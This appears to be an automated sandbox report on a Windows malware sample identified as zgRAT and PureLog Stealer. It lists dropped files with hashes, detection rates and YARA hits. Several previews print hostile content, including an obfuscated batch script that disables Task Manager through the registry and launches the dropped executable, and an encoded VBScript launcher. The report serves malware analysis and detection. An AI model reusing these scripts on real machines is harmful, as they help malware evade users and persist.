                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):98304
                                                                                Entropy (8bit):0.08235737944063153
                                                                                Encrypted:false
                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.8553638852307782
                                                                                Encrypted:false
                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                Malicious:false
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):213
                                                                                Entropy (8bit):5.333616565455925
                                                                                Encrypted:false
                                                                                SSDEEP:6:q5//3StuH1jhRiI36BROcZDNEpXNh/aIQdfzGBiCL4AB0n:g/TVjhR136ROcOqndL0G60
                                                                                MD5:A29756B59756F0110F008E371F219BA1
                                                                                SHA1:33686DA500C2A1AF6344A5CA50A924523AF18EB5
                                                                                SHA-256:151F21446759FED3BB2CB40DE1CAECBA71A6770140AFA50D3DA46457A247B590
                                                                                SHA-512:06154E108095A2F53FDD3FDB69ABFBF51E9E7613C89F254F3F20D37C3E9006C8868C57B0D3EBACC1A7D434001F4476A8D7A256E9E5F27CD493400948898CDEE6
                                                                                Malicious:false
                                                                                Preview:%jOFZHYfvxJcgX%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%FkwJlrKi%..%APxqDrPiMISErn%"%AppData%\ComProviderDriversavescrt/ComrefNetsvc.exe"%aROAF%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):188
                                                                                Entropy (8bit):5.6600439596573695
                                                                                Encrypted:false
                                                                                SSDEEP:3:YrvMWdRGzDSJcIX0zdGh7b/0RrctnGfdrS/XamFT8yEw/vlrJgd+ct4ME/3uD2KT:dWTqDSSIX0x4/0NcnGxSfaBu/9dYvTDB
                                                                                MD5:11CC7A05166AE9F014F8229FCC4A43A0
                                                                                SHA1:A1B25EB0232EE394EDAE3E8BBC9CAEF91F419A23
                                                                                SHA-256:FD9229E9D26EC2CD8D157FBD3556125AEAF52B985437531455CD7E2B62FDFDFE
                                                                                SHA-512:DEAB119D6D2BFECFAC1049398F345547B1209B28F62E429F53205F7931CD9C4BAA316474C7CE28BB734290EDB4B3095705F54197D9CCDB90B3AF105F85FAA639
                                                                                Malicious:false
                                                                                Preview:EEgNGikFRiwoxPbY8LY3CbCoMnR7glU8heL9j9zErPDE6ZxwmJ7H6NJmC2AcQnjpNyHTDcz8VTLwX8rw0eVXoNCTVj6r9XyEqY0ISdsKU8vmBWODKNlwRLAAvx8efH97eHG9HjeWvLDqbZR8U2gvvCweX0WefOoM9xH4QP6ktPAGIUjWg9KmkNMcUlmR
                                                                                Process:C:\Users\user\Desktop\OisrvsB6Ea.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):234
                                                                                Entropy (8bit):5.87016814386512
                                                                                Encrypted:false
                                                                                SSDEEP:6:GhkgwqK+NkLzWbH1rFnBaORbM5nCLEG7uINJa2:GyBMCzWL1hBaORbQCLE6ba2
                                                                                MD5:58D9BC3C577A005201A94186763725EB
                                                                                SHA1:DF8F1DA5E019F66D2AA107515B5FBD9DB863492D
                                                                                SHA-256:41699E402BD653184F8ABBE6D56416DC4E5CF8B51E5809752CC79515A8DC2309
                                                                                SHA-512:F1337EEB89851A3C93B8E3A60F30D96F9E9708960C7BEC6FCF468FD2E892601D61BD15C412BE815B8686FCDC13D77F603B47001A56D0B32978F936AC92A00ED9
                                                                                Malicious:true
                                                                                Preview:#@~^0QAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPrYzw2GlDl]JZKhnMW-k9+.9Mk\../m\+k^.YJzoX};A5_?2..P1.19hy(l*nTR8lDEBPTBP6lVk+5EMAAA==^#~@.
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):224
                                                                                Entropy (8bit):5.729529829798714
                                                                                Encrypted:false
                                                                                SSDEEP:6:3ft3u6O0SCcku2dCyHwjwOMUSAGco+hs2XYn2jXw9kx:Pt3zO0aCzOM5jas2XYnCX0U
                                                                                MD5:572250148974A47FD94047CFD9199A22
                                                                                SHA1:3BBF001BBF0DA27996DC7D6010254FF61C95FBD9
                                                                                SHA-256:1374CD38B92373EDAC5AAAD7E9CBB42D6DF29D068FB8EE6554F7136D8AD7A7B2
                                                                                SHA-512:69A5010A604E9FE25BC92046017889867CCAA72D0A2006724E5918130091419013E952A45346B4A9BB417D1B481334929EDD6DA5172198DFE41BE0E4BEFB7931
                                                                                Malicious:false
                                                                                Preview:eoanSP4vO22SrHqm1Al6I6TMDDrHIvCWQXTC8neimbvH7brLvAGoErEiVNkOixmd0gCUxonOfCUqKLPlVgVIoXRiSvqvCPAyzSQaZXXHW2IBWXXJ793BbezcOdBB71LPCg125zL8IOvvPPM4YhyDW8XUcyL5VVJfq290gfNIx43MtEN8RHnaDI2DIhaHnQmwFQEWQVY2TqPbFLkYlMoOrtbi96s8FGeh
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SearchApp.exe, Author: Joe Security
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):32256
                                                                                Entropy (8bit):5.631194486392901
                                                                                Encrypted:false
                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Joe Sandbox View:
                                                                                • Filename: ntoskrnl2.exe, Detection: malicious, Browse
                                                                                • Filename: top.exe, Detection: malicious, Browse
                                                                                • Filename: DC86.exe, Detection: malicious, Browse
                                                                                • Filename: WinPerfcommon.exe, Detection: malicious, Browse
                                                                                • Filename: Udzp7lL5ns.exe, Detection: malicious, Browse
                                                                                • Filename: loader.exe, Detection: malicious, Browse
                                                                                • Filename: hz7DzW2Yop.exe, Detection: malicious, Browse
                                                                                • Filename: 7aHY4r6vXR.exe, Detection: malicious, Browse
                                                                                • Filename: 0V2JsCrGUB.exe, Detection: malicious, Browse
                                                                                • Filename: FYKrlfQrxb.exe, Detection: malicious, Browse
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):33792
                                                                                Entropy (8bit):5.541771649974822
                                                                                Encrypted:false
                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):32256
                                                                                Entropy (8bit):5.631194486392901
                                                                                Encrypted:false
                                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):33792
                                                                                Entropy (8bit):5.541771649974822
                                                                                Encrypted:false
                                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):36352
                                                                                Entropy (8bit):5.668291349855899
                                                                                Encrypted:false
                                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):36352
                                                                                Entropy (8bit):5.668291349855899
                                                                                Encrypted:false
                                                                                SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 21%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):46592
                                                                                Entropy (8bit):5.870612048031897
                                                                                Encrypted:false
                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):85504
                                                                                Entropy (8bit):5.8769270258874755
                                                                                Encrypted:false
                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):85504
                                                                                Entropy (8bit):5.8769270258874755
                                                                                Encrypted:false
                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):46592
                                                                                Entropy (8bit):5.870612048031897
                                                                                Encrypted:false
                                                                                SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                                MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                                SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                                SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                                SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 5%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64000
                                                                                Entropy (8bit):5.857602289000348
                                                                                Encrypted:false
                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23552
                                                                                Entropy (8bit):5.519109060441589
                                                                                Encrypted:false
                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                Process:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):23552
                                                                                Entropy (8bit):5.519109060441589
                                                                                Encrypted:false
                                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):64000
                                                                                Entropy (8bit):5.857602289000348
                                                                                Encrypted:false
                                                                                SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                                MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                                SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                                SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                                SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):2072064
                                                                                Entropy (8bit):7.58658487031714
                                                                                Encrypted:false
                                                                                SSDEEP:24576:HYr3EZ/kdF9GuY43p1KmQbTGVQTB/QaYz0S2mohG8MovgzgDVz+hpse0TGMii5yd:HYazmKFWQTcZ2moQ8NDz+L2Hii8
                                                                                MD5:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                SHA1:61B75CD9AC8551EF47C5D7C9F09BB42CD0E5D8D5
                                                                                SHA-256:BDE2679020ADE3F5EC36455BF8BB57F4EF24724FDDF832D41E5121C249C75C5D
                                                                                SHA-512:73637592E95C291A9FF7991C4F2EACA70455B2CF5D7FBDC1974F93D3191153D2BE7EB5B970C340F1D9A04A28E946C63E6AC9D070BA6991C59FA2843D5E45A83B
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Process:C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe
                                                                                File Type:ASCII text, with very long lines (637), with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):637
                                                                                Entropy (8bit):5.905047541040198
                                                                                Encrypted:false
                                                                                SSDEEP:12:LfejdH/R533t/9RS8BkPPEe74SCsXz5VCag+sJVYvRm6iG23ZNYNq:LfejNRzfBkPcIdXzdsJSvS3ZNY0
                                                                                MD5:E222350D6C9E0345924E528B5C4EFB43
                                                                                SHA1:85F34A7C49E4BFFA0698515F43025F0B270A3CA5
                                                                                SHA-256:4AA82D428718959BE9BD05CEA5E09DB3DF2E583D059C602B571BD848D92CA7C2
                                                                                SHA-512:3477098132A44633C1B5B84E0B83E2C17B66BB37DDDBE83B80EDF34B1A579142925E2E3CA7BE3F8B9E1CB2A75E08D7031168EBF23EFCC3DB29D8548A0950EC77
                                                                                Malicious:false
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
